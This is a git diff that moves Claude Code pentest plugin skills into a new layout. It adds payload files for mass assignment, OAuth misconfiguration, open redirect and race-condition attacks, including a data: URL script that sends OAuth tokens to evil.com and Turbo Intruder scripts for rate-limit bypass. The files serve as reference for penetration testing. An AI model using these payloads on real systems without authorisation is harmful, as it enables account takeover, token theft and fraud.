a/projects/pentest/.claude/skills/pentest/attacks/web-applications/access-control/access-control-quickstart.md b/plugins/pentest/skills/pentest/attacks/web-applications/access-control/access-control-quickstart.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/web-applications/access-control/access-control-quickstart.md rename to plugins/pentest/skills/pentest/attacks/web-applications/access-control/access-control-quickstart.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/web-applications/access-control/access-control-resources.md b/plugins/pentest/skills/pentest/attacks/web-applications/access-control/access-control-resources.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/web-applications/access-control/access-control-resources.md rename to plugins/pentest/skills/pentest/attacks/web-applications/access-control/access-control-resources.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/web-applications/business-logic/business-logic-cheat-sheet.md b/plugins/pentest/skills/pentest/attacks/web-applications/business-logic/business-logic-cheat-sheet.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/web-applications/business-logic/business-logic-cheat-sheet.md rename to plugins/pentest/skills/pentest/attacks/web-applications/business-logic/business-logic-cheat-sheet.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/web-applications/business-logic/business-logic-portswigger-labs-complete.md b/plugins/pentest/skills/pentest/attacks/web-applications/business-logic/business-logic-portswigger-labs-complete.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/web-applications/business-logic/business-logic-portswigger-labs-complete.md rename to plugins/pentest/skills/pentest/attacks/web-applications/business-logic/business-logic-portswigger-labs-complete.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/web-applications/business-logic/business-logic-quickstart.md b/plugins/pentest/skills/pentest/attacks/web-applications/business-logic/business-logic-quickstart.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/web-applications/business-logic/business-logic-quickstart.md rename to plugins/pentest/skills/pentest/attacks/web-applications/business-logic/business-logic-quickstart.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/web-applications/business-logic/business-logic-resources.md b/plugins/pentest/skills/pentest/attacks/web-applications/business-logic/business-logic-resources.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/web-applications/business-logic/business-logic-resources.md rename to plugins/pentest/skills/pentest/attacks/web-applications/business-logic/business-logic-resources.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/web-applications/cache-deception/web-cache-deception-cheat-sheet.md b/plugins/pentest/skills/pentest/attacks/web-applications/cache-deception/web-cache-deception-cheat-sheet.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/web-applications/cache-deception/web-cache-deception-cheat-sheet.md rename to plugins/pentest/skills/pentest/attacks/web-applications/cache-deception/web-cache-deception-cheat-sheet.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/web-applications/cache-deception/web-cache-deception-index.md b/plugins/pentest/skills/pentest/attacks/web-applications/cache-deception/web-cache-deception-index.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/web-applications/cache-deception/web-cache-deception-index.md rename to plugins/pentest/skills/pentest/attacks/web-applications/cache-deception/web-cache-deception-index.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/web-applications/cache-deception/web-cache-deception-portswigger-labs-complete.md b/plugins/pentest/skills/pentest/attacks/web-applications/cache-deception/web-cache-deception-portswigger-labs-complete.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/web-applications/cache-deception/web-cache-deception-portswigger-labs-complete.md rename to plugins/pentest/skills/pentest/attacks/web-applications/cache-deception/web-cache-deception-portswigger-labs-complete.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/web-applications/cache-deception/web-cache-deception-quickstart.md b/plugins/pentest/skills/pentest/attacks/web-applications/cache-deception/web-cache-deception-quickstart.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/web-applications/cache-deception/web-cache-deception-quickstart.md rename to plugins/pentest/skills/pentest/attacks/web-applications/cache-deception/web-cache-deception-quickstart.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/web-applications/cache-deception/web-cache-deception-resources.md b/plugins/pentest/skills/pentest/attacks/web-applications/cache-deception/web-cache-deception-resources.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/web-applications/cache-deception/web-cache-deception-resources.md rename to plugins/pentest/skills/pentest/attacks/web-applications/cache-deception/web-cache-deception-resources.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/web-applications/cache-poisoning/web-cache-poisoning-cheat-sheet.md b/plugins/pentest/skills/pentest/attacks/web-applications/cache-poisoning/web-cache-poisoning-cheat-sheet.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/web-applications/cache-poisoning/web-cache-poisoning-cheat-sheet.md rename to plugins/pentest/skills/pentest/attacks/web-applications/cache-poisoning/web-cache-poisoning-cheat-sheet.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/web-applications/cache-poisoning/web-cache-poisoning-portswigger-labs-complete.md b/plugins/pentest/skills/pentest/attacks/web-applications/cache-poisoning/web-cache-poisoning-portswigger-labs-complete.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/web-applications/cache-poisoning/web-cache-poisoning-portswigger-labs-complete.md rename to plugins/pentest/skills/pentest/attacks/web-applications/cache-poisoning/web-cache-poisoning-portswigger-labs-complete.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/web-applications/cache-poisoning/web-cache-poisoning-quickstart.md b/plugins/pentest/skills/pentest/attacks/web-applications/cache-poisoning/web-cache-poisoning-quickstart.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/web-applications/cache-poisoning/web-cache-poisoning-quickstart.md rename to plugins/pentest/skills/pentest/attacks/web-applications/cache-poisoning/web-cache-poisoning-quickstart.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/web-applications/cache-poisoning/web-cache-poisoning-resources.md b/plugins/pentest/skills/pentest/attacks/web-applications/cache-poisoning/web-cache-poisoning-resources.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/web-applications/cache-poisoning/web-cache-poisoning-resources.md rename to plugins/pentest/skills/pentest/attacks/web-applications/cache-poisoning/web-cache-poisoning-resources.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/web-applications/info-disclosure/information-disclosure-cheat-sheet.md b/plugins/pentest/skills/pentest/attacks/web-applications/info-disclosure/information-disclosure-cheat-sheet.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/web-applications/info-disclosure/information-disclosure-cheat-sheet.md rename to plugins/pentest/skills/pentest/attacks/web-applications/info-disclosure/information-disclosure-cheat-sheet.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/web-applications/info-disclosure/information-disclosure-portswigger-labs-complete.md b/plugins/pentest/skills/pentest/attacks/web-applications/info-disclosure/information-disclosure-portswigger-labs-complete.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/web-applications/info-disclosure/information-disclosure-portswigger-labs-complete.md rename to plugins/pentest/skills/pentest/attacks/web-applications/info-disclosure/information-disclosure-portswigger-labs-complete.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/web-applications/info-disclosure/information-disclosure-resources.md b/plugins/pentest/skills/pentest/attacks/web-applications/info-disclosure/information-disclosure-resources.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/web-applications/info-disclosure/information-disclosure-resources.md rename to plugins/pentest/skills/pentest/attacks/web-applications/info-disclosure/information-disclosure-resources.md diff --git a/plugins/pentest/skills/pentest/attacks/web-applications/mass-assignment/payloads/basic.md b/plugins/pentest/skills/pentest/attacks/web-applications/mass-assignment/payloads/basic.md new file mode 100644 index 0000000..8d41f0a --- /dev/null +++ b/plugins/pentest/skills/pentest/attacks/web-applications/mass-assignment/payloads/basic.md @@ -0,0 +1,110 @@ +--- +source: PayloadsAllTheThings +patt-path: Mass Assignment/README.md +patt-url: https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Mass%20Assignment/README.md +last-curated: 2026-03-13 +priority: critical +--- + +# Mass Assignment — Basic Payloads + +## What It Is + +Mass assignment occurs when an application automatically binds HTTP request parameters to object properties without allowlisting, allowing attackers to set unintended fields. + +## Hidden Parameter Injection + +**Registration endpoint — inject admin flag:** +```json +POST /api/register +{ + "username": "attacker", + "email": "attacker@evil.com", + "password": "password123", + "isAdmin": true +} +``` + +**Update profile — inject role:** +```json +PUT /api/users/me +{ + "name": "Attacker", + "email": "attacker@evil.com", + "role": "admin", + "verified": true +} +``` + +## JSON Property Injection (common fields to try) + +```json +{ + "isAdmin": true, + "is_admin": true, + "admin": true, + "role": "admin", + "role": "superuser", + "userType": "ADMIN", + "accountType": "premium", + "verified": true, + "active": true, + "banned": false, + "credits": 99999, + "balance": 99999, + "permissions": ["read","write","delete","admin"] +} +``` + +## Role Escalation via Nested Object + +```json +PUT /api/users/123 +{ + "profile": { + "name": "Attacker" + }, + "role": "admin", + "subscription": "enterprise" +} +``` + +## XML Mass Assignment + +```xml +<user> + <username>attacker</username> + <password>pass123</password> + <isAdmin>true</isAdmin> + <role>admin</role> +</user> +``` + +## Form Parameter Injection + +``` +POST /register +username=attacker&password=pass&email=a@b.com&isAdmin=true&role=admin +``` + +## Discovery (Guessing Hidden Fields) + +Common field names to try: +``` +isAdmin / is_admin / admin +role / userRole / user_role +accountType / account_type +verified / email_verified +active / enabled +credits / balance / points +permissions / scopes +plan / subscription / tier +``` + +**Approach:** +1. Register normal user → capture response body +2. Look for user object fields in response +3. Try injecting those field names in future requests +4. Fuzz with wordlist: `arjun -u https://target.com/api/register -m POST` + +*Full list: patt-fetcher agent → "Mass Assignment"* diff --git a/plugins/pentest/skills/pentest/attacks/web-applications/oauth-misconfig/payloads/basic.md b/plugins/pentest/skills/pentest/attacks/web-applications/oauth-misconfig/payloads/basic.md new file mode 100644 index 0000000..f5c6c2d --- /dev/null +++ b/plugins/pentest/skills/pentest/attacks/web-applications/oauth-misconfig/payloads/basic.md @@ -0,0 +1,112 @@ +--- +source: PayloadsAllTheThings +patt-path: OAuth Misconfiguration/README.md +patt-url: https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/OAuth%20Misconfiguration/README.md +last-curated: 2026-03-13 +priority: critical +--- + +# OAuth Misconfiguration — Basic Payloads + +## redirect_uri Bypass + +**Direct manipulation:** +``` +https://auth.example.com/oauth/authorize? + client_id=CLIENT_ID& + redirect_uri=https://evil.com& + response_type=code&scope=openid + +# Subdomain bypass +&redirect_uri=https://evil.example.com + +# Path traversal +&redirect_uri=https://legitimate.com/../../../evil.com + +# @ trick +&redirect_uri=https://legitimate.com@evil.com +``` + +**Open redirect chain:** +``` +https://auth.example.com/oauth/authorize? + client_id=CLIENT_ID& + redirect_uri=https://trusted.com/redirect?url=https://evil.com& + response_type=code +``` + +**Fragment bypass:** +``` +&redirect_uri=https://legitimate.com%23attacker.com +``` + +## State Parameter Omission (CSRF) + +**Attack flow:** +``` +1. Attacker starts OAuth: GET /oauth/authorize?client_id=X&redirect_uri=ATTACKER_REDIRECT +2. Auth server issues code → attacker captures: https://attacker.com/?code=AUTH_CODE +3. Attacker tricks victim into visiting: https://app.com/callback?code=AUTH_CODE +4. App binds attacker's account to victim's session → account takeover +``` + +**Detection:** Request missing `state` parameter or server accepts arbitrary `state`: +``` +&state= # empty +&state=CSRF_TOKEN_MISSING +# If server doesn't validate → vulnerable +``` + +## Implicit Flow Token Leakage + +``` +# Implicit flow exposes token in URL fragment +GET /oauth/authorize?response_type=token&client_id=X&redirect_uri=https://app.com + +# Redirect: https://app.com/callback#access_token=TOKEN&token_type=Bearer + +# Attacker payload in state → XSS to steal fragment +&state=<script>alert(document.location.hash)</script> + +# Referrer leakage: token in URL → logged in Referer header +``` + +**Steal token via redirect_uri with data: URL:** +``` +&redirect_uri=data:text/html,<script>document.location='https://evil.com/?t='+location.hash</script> +``` + +## PKCE Downgrade Attack + +``` +# PKCE-protected flow: +code_challenge=BASE64(SHA256(code_verifier)) +code_challenge_method=S256 + +# Downgrade: remove PKCE params +GET /oauth/authorize? + client_id=X& + redirect_uri=https://app.com/callback& + response_type=code& + scope=openid + # NO code_challenge or code_challenge_method + +# If server accepts → intercept code → exchange without verifier +POST /oauth/token + code=INTERCEPTED_CODE& + client_id=X& + redirect_uri=https://app.com/callback& + grant_type=authorization_code + # NO code_verifier +``` + +## Scope Escalation + +``` +# Request higher scope than allowed +&scope=openid profile email admin +&scope=read write delete +&scope=user:admin +``` + +*Full list: patt-fetcher agent → "OAuth Misconfiguration"* diff --git a/plugins/pentest/skills/pentest/attacks/web-applications/open-redirect/payloads/basic.md b/plugins/pentest/skills/pentest/attacks/web-applications/open-redirect/payloads/basic.md new file mode 100644 index 0000000..cee45a3 --- /dev/null +++ b/plugins/pentest/skills/pentest/attacks/web-applications/open-redirect/payloads/basic.md @@ -0,0 +1,89 @@ +--- +source: PayloadsAllTheThings +patt-path: Open Redirect/README.md +patt-url: https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Open%20Redirect/README.md +last-curated: 2026-03-13 +priority: critical +--- + +# Open Redirect — Basic Payloads + +## Double Slash (//) Tricks + +``` +//evil.com +////evil.com +///evil.com +\/\/evil.com/ +/\/evil.com/ +//evil.com/%2F.. +//evil.com?@target.com +``` + +## @ Character Tricks + +``` +https://target.com@evil.com +http://target.com@evil.com/ +https://target.com/login?next=https://target.com@evil.com +``` + +## Whitelisted Domain Bypass + +``` +https://evil.target.com # subdomain of target +https://target.com.evil.com # domain after trusted +https://www.target.com.evil.com/ +https://notevil.com?url=evil.com # open redirect chain +``` + +## Protocol-Relative URLs + +``` +//evil.com # protocol-relative +https:evil.com # colon without slashes +https:\evil.com +``` + +## Unicode / Special Characters + +``` +https://evil.c℀.target.com # ℀ normalizes to 'ca/' +http://a.com/X.b.com # fullwidth slash U+FF0F +//google%E3%80%82com # %E3%80%82 = ideographic full stop '。' +//evil%00.com # null byte +//evil%0d%0a.com # CRLF +``` + +## URL Encoding Bypass + +``` +?url=%2F%2Fevil.com +?url=%68%74%74%70%3a%2f%2f%65%76%69%6c%2e%63%6f%6d +?url=https%3A%2F%2Fevil.com +?url=%2Fevil.com +``` + +## Double URL Encoding + +``` +?url=%252F%252Fevil.com +?url=%25%32%46%25%32%46evil.com +``` + +## Common Parameter Names + +``` +url=, redirect=, redirect_url=, redirect_uri=, return=, returnTo=, +return_url=, next=, dest=, destination=, go=, goto=, continue=, +target=, rurl=, out=, view=, to=, image_url=, checkout_url= +``` + +## Chaining with OAuth + +``` +# Use open redirect on trusted domain as OAuth redirect_uri +https://auth.example.com/oauth?redirect_uri=https://trusted.com/redirect?url=//evil.com +``` + +*Full list: patt-fetcher agent → "Open Redirect"* diff --git a/plugins/pentest/skills/pentest/attacks/web-applications/race-conditions/payloads/techniques.md b/plugins/pentest/skills/pentest/attacks/web-applications/race-conditions/payloads/techniques.md new file mode 100644 index 0000000..952fec0 --- /dev/null +++ b/plugins/pentest/skills/pentest/attacks/web-applications/race-conditions/payloads/techniques.md @@ -0,0 +1,120 @@ +--- +source: PayloadsAllTheThings +patt-path: Race Condition/README.md +patt-url: https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Race%20Condition/README.md +last-curated: 2026-03-14 +priority: high +--- + +# Race Conditions — Techniques Payloads + +## Quick Hits + +### Burp Suite — HTTP/2 Single-Packet Attack +1. Send request to Repeater +2. Duplicate 20 times (`CTRL+R`) +3. Group all → "Send group in parallel" +4. Observe: duplicate processing, limit bypass, etc. + +### Turbo Intruder — Basic concurrent template +```python +def queueRequests(target, wordlists): + engine = RequestEngine(endpoint=target.endpoint, + concurrentConnections=30, + requestsPerConnection=30, + pipeline=False) + for i in range(30): + engine.queue(target.req, target.baseInput, gate='race1') + engine.openGate('race1') + engine.complete(timeout=60) + +def handleResponse(req, interesting): + table.add(req) +``` +> **Required**: Add `x-request: %s` header to request in Turbo Intruder. + +### HTTP/1.1 Last-Byte Sync +```python +engine.queue(request, gate='race1') +engine.queue(request, gate='race1') +engine.openGate('race1') # releases both simultaneously +``` + +## Extended List + +### Turbo Intruder — Multi-endpoint race +```python +def queueRequests(target, wordlists): + engine = RequestEngine(endpoint=target.endpoint, + concurrentConnections=30, + requestsPerConnection=100, + pipeline=False) + request1 = '''POST /coupon/apply HTTP/1.1 +Host: target.com +Cookie: session=VALUE +Content-Length: 20 + +code=DISCOUNT50''' + + request2 = '''POST /checkout HTTP/1.1 +Host: target.com +Cookie: session=VALUE +Content-Length: 0 + +''' + engine.queue(request1, gate='race1') + for i in range(30): + engine.queue(request2, gate='race1') + engine.openGate('race1') + engine.complete(timeout=60) + +def handleResponse(req, interesting): + table.add(req) +``` + +### Limit-overrun target checklist +| Target | Attack | +|---|---| +| Gift card / coupon redemption | Apply same code 30× simultaneously | +| Single-use invite links | Claim 30× before deactivation | +| Bank transfer balance check | Withdraw > balance via concurrent transfers | +| Vote / like deduplication | Submit vote 30× in one gate | +| Two-factor window | Race OTP verification + session creation | +| File upload + AV scan | Upload, then access before scan completes | + +### Rate-limit bypass (parallel) +```python +# 30 login attempts arrive simultaneously, rate-limiter sees 1 burst +for i in range(30): + engine.queue(target.req, wordlists.zip[i], gate='race1') +engine.openGate('race1') +``` + +### h2spacex (HTTP/2 raw, Python) +```python +# Single-packet attack via Scapy HTTP/2 +from h2spacex import H2OnTlsConn +conn = H2OnTlsConn('target.com', 443) +conn.send_n_requests_same_time(request_list) +``` + +## Bypass Variants + +| Defense | Bypass | +|---|---| +| Mutex / DB transaction | Race before lock acquired (pre-lock window) | +| UUID one-time tokens | Race same token across two sessions | +| TOCTOU file check | Race between check and use (upload → exec) | +| Async queue | Race enqueue vs. dequeue processing | +| Distributed rate limit | Route requests to different nodes | + +## Notes + +- HTTP/2 single-packet is the most reliable; eliminates network jitter +- Start with 20–30 concurrent copies; increase if timing window is narrow +- Look for state changes in responses: different status codes, balance changes, different session IDs +- James Kettle's research ("Smashing the state machine") is the key reference +- Tools: Turbo Intruder, Raceocat, h2spacex, Burp Repeater group + +--- +*Full list: `patt-fetcher` agent → "Race Condition"* diff --git a/projects/pentest/.claude/skills/pentest/attacks/web-applications/race-conditions/race-conditions-cheat-sheet.md b/plugins/pentest/skills/pentest/attacks/web-applications/race-conditions/race-conditions-cheat-sheet.md similarity index 94% rename from projects/pentest/.claude/skills/pentest/attacks/web-applications/race-conditions/race-conditions-cheat-sheet.md rename to plugins/pentest/skills/pentest/attacks/web-applications/race-conditions/race-conditions-cheat-sheet.md index ea57976..683f355 100644 --- a/projects/pentest/.claude/skills/pentest/attacks/web-applications/race-conditions/race-conditions-cheat-sheet.md +++ b/plugins/pentest/skills/pentest/attacks/web-applications/race-conditions/race-conditions-cheat-sheet.md @@ -1029,6 +1029,53 @@ Attempt 2: Failure (state changed!) - Pattern matching - Timing analysis +<!-- PATT enrichment 2026-03-14 --> +### h2spacex (HTTP/2 Single-Packet via Scapy) + +Python library for crafting HTTP/2 single-packet attacks at the raw socket level: +```bash +pip install h2spacex +``` +```python +from h2spacex import H2OnTlsConn +conn = H2OnTlsConn('target.com', 443) +conn.send_n_requests_same_time(request_list) +``` +Use when Burp's single-packet attack is blocked or unavailable. + +### Raceocat + +Streamlined race condition exploitation framework — wraps Turbo Intruder patterns with a simpler CLI: +```bash +# Limit overrun +raceocat --url https://target.com/coupon --data "code=PROMO20" --count 30 --gate + +# Multi-endpoint +raceocat --url1 https://target.com/checkout --url2 https://target.com/cart/add --gate +``` + +### State Machine Disruption (James Kettle research) + +Beyond limit-overrun: race conditions can disrupt object creation state machines. + +**Partial object construction:** +- Registration flow creates user object in steps (name → email → password → role) +- Race the confirmation step during object construction (null token window): +``` +POST /confirm?token[]= # PHP: null == [] → true during race window +``` +- 50 confirmation requests per registration attempt, released simultaneously + +**Sub-state exploitation pattern:** +```python +engine.queue(registerReq, username, gate=str(attempt)) +for i in range(50): + engine.queue(confirmNullReq, gate=str(attempt)) +engine.openGate(str(attempt)) +``` + +<!-- end PATT enrichment 2026-03-14 --> + ### Command-Line Tools ```bash diff --git a/projects/pentest/.claude/skills/pentest/attacks/web-applications/race-conditions/race-conditions-index.md b/plugins/pentest/skills/pentest/attacks/web-applications/race-conditions/race-conditions-index.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/web-applications/race-conditions/race-conditions-index.md rename to plugins/pentest/skills/pentest/attacks/web-applications/race-conditions/race-conditions-index.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/web-applications/race-conditions/race-conditions-portswigger-labs-complete.md b/plugins/pentest/skills/pentest/attacks/web-applications/race-conditions/race-conditions-portswigger-labs-complete.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/web-applications/race-conditions/race-conditions-portswigger-labs-complete.md rename to plugins/pentest/skills/pentest/attacks/web-applications/race-conditions/race-conditions-portswigger-labs-complete.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/web-applications/race-conditions/race-conditions-quickstart.md b/plugins/pentest/skills/pentest/attacks/web-applications/race-conditions/race-conditions-quickstart.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/web-applications/race-conditions/race-conditions-quickstart.md rename to plugins/pentest/skills/pentest/attacks/web-applications/race-conditions/race-conditions-quickstart.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/web-applications/race-conditions/race-conditions-resources.md b/plugins/pentest/skills/pentest/attacks/web-applications/race-conditions/race-conditions-resources.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/web-applications/race-conditions/race-conditions-resources.md rename to plugins/pentest/skills/pentest/attacks/web-applications/race-conditions/race-conditions-resources.md diff --git a/projects/pentest/.claude/skills/pentest/reference/ATTACK_INDEX.md b/plugins/pentest/skills/pentest/reference/ATTACK_INDEX.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/reference/ATTACK_INDEX.md rename to plugins/pentest/skills/pentest/reference/ATTACK_INDEX.md diff --git a/projects/pentest/.claude/skills/pentest/reference/FINAL_REPORT.md b/plugins/pentest/skills/pentest/reference/FINAL_REPORT.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/reference/FINAL_REPORT.md rename to plugins/pentest/skills/pentest/reference/FINAL_REPORT.md diff --git a/projects/pentest/.claude/skills/pentest/reference/OUTPUT_STRUCTURE.md b/plugins/pentest/skills/pentest/reference/OUTPUT_STRUCTURE.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/reference/OUTPUT_STRUCTURE.md rename to plugins/pentest/skills/pentest/reference/OUTPUT_STRUCTURE.md diff --git a/projects/pentest/.claude/skills/pentest/reference/RECONNAISSANCE_OUTPUT.md b/plugins/pentest/skills/pentest/reference/RECONNAISSANCE_OUTPUT.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/reference/RECONNAISSANCE_OUTPUT.md rename to plugins/pentest/skills/pentest/reference/RECONNAISSANCE_OUTPUT.md diff --git a/projects/pentest/.claude/skills/web-application-mapping/SKILL.md b/plugins/pentest/skills/web-application-mapping/SKILL.md similarity index 100% rename from projects/pentest/.claude/skills/web-application-mapping/SKILL.md rename to plugins/pentest/skills/web-application-mapping/SKILL.md diff --git a/plugins/skiller/.claude-plugin/plugin.json b/plugins/skiller/.claude-plugin/plugin.json new file mode 100644 index 0000000..e3ef380 --- /dev/null +++ b/plugins/skiller/.claude-plugin/plugin.json @@ -0,0 +1,11 @@ +{ + "name": "skiller", + "version": "1.0.0", + "description": "Skill creation meta-tool — automates issue creation, branch management, skill generation, validation, and PR submission for Claude Code plugins", + "author": { + "name": "Transilience AI", + "url": "https://github.com/transilienceai" + }, + "repository": "https://github.com/transilienceai/communitytools", + "license": "MIT" +} diff --git a/.claude/agents/skiller.md b/plugins/skiller/agents/skiller.md similarity index 100% rename from .claude/agents/skiller.md rename to plugins/skiller/agents/skiller.md diff --git a/.claude/skills/skiller/README.md b/plugins/skiller/skills/skiller/README.md similarity index 100% rename from .claude/skills/skiller/README.md rename to plugins/skiller/skills/skiller/README.md diff --git a/.claude/skills/skiller/SKILL.md b/plugins/skiller/skills/skiller/SKILL.md similarity index 100% rename from .claude/skills/skiller/SKILL.md rename to plugins/skiller/skills/skiller/SKILL.md diff --git a/.claude/skills/skiller/reference/CONTENT.md b/plugins/skiller/skills/skiller/reference/CONTENT.md similarity index 100% rename from .claude/skills/skiller/reference/CONTENT.md rename to plugins/skiller/skills/skiller/reference/CONTENT.md diff --git a/.claude/skills/skiller/reference/FRONTMATTER.md b/plugins/skiller/skills/skiller/reference/FRONTMATTER.md similarity index 100% rename from .claude/skills/skiller/reference/FRONTMATTER.md rename to plugins/skiller/skills/skiller/reference/FRONTMATTER.md diff --git a/.claude/skills/skiller/reference/STRUCTURE.md b/plugins/skiller/skills/skiller/reference/STRUCTURE.md similarity index 100% rename from .claude/skills/skiller/reference/STRUCTURE.md rename to plugins/skiller/skills/skiller/reference/STRUCTURE.md diff --git a/plugins/techstack-identification/.claude-plugin/plugin.json b/plugins/techstack-identification/.claude-plugin/plugin.json new file mode 100644 index 0000000..2c23481 --- /dev/null +++ b/plugins/techstack-identification/.claude-plugin/plugin.json @@ -0,0 +1,11 @@ +{ + "name": "techstack-identification", + "version": "1.0.0", + "description": "Tech stack reconnaissance — 26 skills and 5 agents for DNS intelligence, cloud detection, subdomain enumeration, certificate transparency, and more", + "author": { + "name": "Transilience AI", + "url": "https://github.com/transilienceai" + }, + "repository": "https://github.com/transilienceai/communitytools", + "license": "MIT" +} diff --git a/projects/techstack_identification/.claude/agents/asset_discovery_agent.md b/plugins/techstack-identification/agents/asset_discovery_agent.md similarity index 100% rename from projects/techstack_identification/.claude/agents/asset_discovery_agent.md rename to plugins/techstack-identification/agents/asset_discovery_agent.md diff --git a/projects/techstack_identification/.claude/agents/correlation_agent.md b/plugins/techstack-identification/agents/correlation_agent.md similarity index 100% rename from projects/techstack_identification/.claude/agents/correlation_agent.md rename to plugins/techstack-identification/agents/correlation_agent.md diff --git a/projects/techstack_identification/.claude/agents/data_collection_agent.md b/plugins/techstack-identification/agents/data_collection_agent.md similarity index 100% rename from projects/techstack_identification/.claude/agents/data_collection_agent.md rename to plugins/techstack-identification/agents/data_collection_agent.md diff --git a/projects/techstack_identification/.claude/agents/report_generation_agent.md b/plugins/techstack-identification/agents/report_generation_agent.md similarity index 100% rename from projects/techstack_identification/.claude/agents/report_generation_agent.md rename to plugins/techstack-identification/agents/report_generation_agent.md diff --git a/projects/techstack_identification/.claude/agents/tech_inference_agent.md b/plugins/techstack-identification/agents/tech_inference_agent.md similarity index 100% rename from projects/techstack_identification/.claude/agents/tech_inference_agent.md rename to plugins/techstack-identification/agents/tech_inference_agent.md diff --git a/projects/techstack_identification/.claude/hooks/skills/post_skill_logging_hook.sh b/plugins/techstack-identification/hooks/scripts/post_skill_logging_hook.sh old mode 100755 new mode 100644 similarity index 100% rename from projects/techstack_identification/.claude/hooks/skills/post_skill_logging_hook.sh rename to plugins/techstack-identification/hooks/scripts/post_skill_logging_hook.sh diff --git a/projects/techstack_identification/.claude/hooks/skills/pre_network_skill_hook.sh b/plugins/techstack-identification/hooks/scripts/pre_network_skill_hook.sh old mode 100755 new mode 100644 similarity index 100% rename from projects/techstack_identification/.claude/hooks/skills/pre_network_skill_hook.sh rename to plugins/techstack-identification/hooks/scripts/pre_network_skill_hook.sh diff --git a/projects/techstack_identification/.claude/hooks/skills/pre_rate_limit_hook.sh b/plugins/techstack-identification/hooks/scripts/pre_rate_limit_hook.sh old mode 100755 new mode 100644 similarity index 100% rename from projects/techstack_identification/.claude/hooks/skills/pre_rate_limit_hook.sh rename to plugins/techstack-identification/hooks/scripts/pre_rate_limit_hook.sh diff --git a/projects/techstack_identification/.claude/skills/api_portal_discovery/SKILL.md b/plugins/techstack-identification/skills/api_portal_discovery/SKILL.md similarity index 100% rename from projects/techstack_identification/.claude/skills/api_portal_discovery/SKILL.md rename to plugins/techstack-identification/skills/api_portal_discovery/SKILL.md diff --git a/projects/techstack_identification/.claude/skills/backend_inferencer/SKILL.md b/plugins/techstack-identification/skills/backend_inferencer/SKILL.md similarity index 100% rename from projects/techstack_identification/.claude/skills/backend_inferencer/SKILL.md rename to plugins/techstack-identification/skills/backend_inferencer/SKILL.md diff --git a/projects/techstack_identification/.claude/skills/cdn_waf_fingerprinter/SKILL.md b/plugins/techstack-identification/skills/cdn_waf_fingerprinter/SKILL.md similarity index 100% rename from projects/techstack_identification/.claude/skills/cdn_waf_fingerprinter/SKILL.md rename to plugins/techstack-identification/skills/cdn_waf_fingerprinter/SKILL.md diff --git a/projects/techstack_identification/.claude/skills/certificate_transparency/SKILL.md b/plugins/techstack-identification/skills/certificate_transparency/SKILL.md similarity index 100% rename from projects/techstack_identification/.claude/skills/certificate_transparency/SKILL.md rename to plugins/techstack-identification/skills/certificate_transparency/SKILL.md diff --git a/projects/techstack_identification/.claude/skills/cloud_infra_detector/SKILL.md b/plugins/techstack-identification/skills/cloud_infra_detector/SKILL.md similarity index 100% rename from projects/techstack_identification/.claude/skills/cloud_infra_detector/SKILL.md rename to plugins/techstack-identification/skills/cloud_infra_detector/SKILL.md diff --git a/projects/techstack_identification/.claude/skills/code_repository_intel/SKILL.md b/plugins/techstack-identification/skills/code_repository_intel/SKILL.md similarity index 100% rename from projects/techstack_identification/.claude/skills/code_repository_intel/SKILL.md rename to plugins/techstack-identification/skills/code_repository_intel/SKILL.md diff --git a/projects/techstack_identification/.claude/skills/confidence_scorer/SKILL.md b/plugins/techstack-identification/skills/confidence_scorer/SKILL.md similarity index 100% rename from projects/techstack_identification/.claude/skills/confidence_scorer/SKILL.md rename to plugins/techstack-identification/skills/confidence_scorer/SKILL.md diff --git a/projects/techstack_identification/.claude/skills/conflict_resolver/SKILL.md b/plugins/techstack-identification/skills/conflict_resolver/SKILL.md similarity index 100% rename from projects/techstack_identification/.claude/skills/conflict_resolver/SKILL.md rename to 